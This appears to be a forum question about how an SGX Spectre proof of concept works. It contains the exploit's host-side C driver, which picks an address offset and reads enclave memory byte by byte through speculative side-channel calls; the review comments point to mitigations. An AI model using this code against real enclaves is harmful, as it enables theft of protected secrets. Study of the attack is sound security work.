Could anyone explain how the SGX Spectre attack works?
How is the ecall_get_offset() caching function actually used in this SGX Spectre exploit?
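/*
 * Host-side driver of the proof-of-concept: chooses a starting offset, then
 * calls readMemoryByte() once per byte and prints the best and second-best
 * guess together with their scores.
 *
 * With no extra arguments, the starting offset is whatever ecall_get_offset()
 * stores in malicious_x, and 40 bytes are read. With exactly two arguments,
 * argv[1] is an address (parsed with %p) that is converted into an offset
 * relative to array1dupe, and argv[2] is the number of bytes to read.
 *
 * NOTE(review): ecall_get_offset() is not shown here. At this call site it is
 * used only to obtain the default value of malicious_x; what that value
 * points at is decided inside the enclave -- confirm against the enclave
 * source.
 *
 * NOTE(review): the offset is chosen entirely by this untrusted code. If
 * readMemoryByte() forwards it to a bounds-checked enclave access (not
 * visible here), that check needs a speculation barrier or index masking on
 * the enclave side -- confirm against the enclave source.
 *
 * Returns 0 on completion and 1 when the command-line arguments cannot be
 * parsed. Calls abort() if the ecall does not return SGX_SUCCESS.
 */
int spectre_main(int argc, char **argv) {
    size_t malicious_x;
    int len = 40;
    int score[2];
    uint8_t value[2];

    sgx_status_t ret = ecall_get_offset(global_eid, &malicious_x); /* default for malicious_x */
    if (ret != SGX_SUCCESS) {
        abort();
    }

    /* Write to array2 so its pages are backed by RAM rather than
     * copy-on-write zero pages. A size_t index avoids the signed/unsigned
     * comparison against sizeof. */
    for (size_t i = 0; i < sizeof(array2); i++) {
        array2[i] = 1;
    }

    if (argc == 3) {
        void *addr = NULL;

        /* Parse into a real void * instead of aliasing a size_t through
         * void **, and reject input that does not parse: the original went
         * on with a half-initialised offset or length in that case. */
        if (sscanf(argv[1], "%p", &addr) != 1 ||
            sscanf(argv[2], "%d", &len) != 1 ||
            len < 0) {
            fprintf(stderr, "usage: %s <address> <length>\n", argv[0]);
            return 1;
        }

        /* Convert the address into an offset relative to array1dupe. */
        malicious_x = (size_t)addr - (size_t)array1dupe;
    }

    printf("Reading %d bytes:\n", len);
    while (--len >= 0) {
        printf("Reading at malicious_x = %p... ", (void *)malicious_x);
        readMemoryByte(malicious_x++, value, score);

        /* "Success" means the best guess scored at least twice the
         * runner-up; anything closer is reported as "Unclear". */
        printf("%s: ", (score[0] >= 2 * score[1] ? "Success" : "Unclear"));

        /* Print the byte as a character only when it is printable ASCII. */
        printf("0x%02X='%c' score=%d ", value[0],
               (value[0] > 31 && value[0] < 127 ? value[0] : '?'), score[0]);
        if (score[1] > 0) {
            printf("(second best: 0x%02X score=%d)", value[1], score[1]);
        }
        printf("\n");
    }
    return (0);
}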